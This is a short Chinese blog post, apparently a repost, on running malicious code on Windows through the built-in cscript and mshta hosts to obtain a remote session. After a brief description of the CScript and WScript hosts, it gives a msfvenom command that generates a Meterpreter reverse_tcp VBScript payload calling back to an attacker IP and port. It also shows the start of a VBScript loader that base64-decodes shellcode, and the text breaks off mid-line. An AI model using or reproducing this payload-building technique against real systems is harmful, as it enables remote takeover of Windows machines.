cscript 执行代码_在Windows上执行恶意代码 by cscript&mshta

  • Post author:
  • Post category:其他


Windows自带的可执行文件+合理构造的payload脚本=获得会话

cscript

简介

在cscript.exe来寻找和连接脚本的运行库,最常见的有VBScript和JavaScript。

WSH环境包括两个脚本宿主:基于控制台的CScript和基于GUI的WScript。这两个脚本宿主提供几乎相同的功能,在大多数情况下,使用哪个脚本宿主来运行脚本并不重要。

两个例外在于您如何与脚本交互; 也就是说,如何将信息输入脚本(输入)以及脚本如何显示已检索的信息(输出)。通常,CScript从命令提示符接收输入并在命令窗口中显示输出。相比之下,WScript通过图形对话框接收输入,并在图形消息框中显示输出。

实践

生成payload msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.138.142 LPORT=4444 -f vbs -o ./1.vbs,查看下生成的内容(限于篇幅略去,有个很长的字符串就是payload.exe)

有人翻译了一下,得到如下结果

shellcode = WScript.Arguments.Item(0)

strXML = “” & shellcode & “”

Set oXMLDoc = CreateObject(“MSXML2.DOMDocument.3.0”)

oXMLDoc.LoadXML(strXML) decode = oXMLDoc.selectsinglenode(“B64DECODE”).nodeTypedValue

set oXMLDoc = no



版权声明:本文为weixin_28950403原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。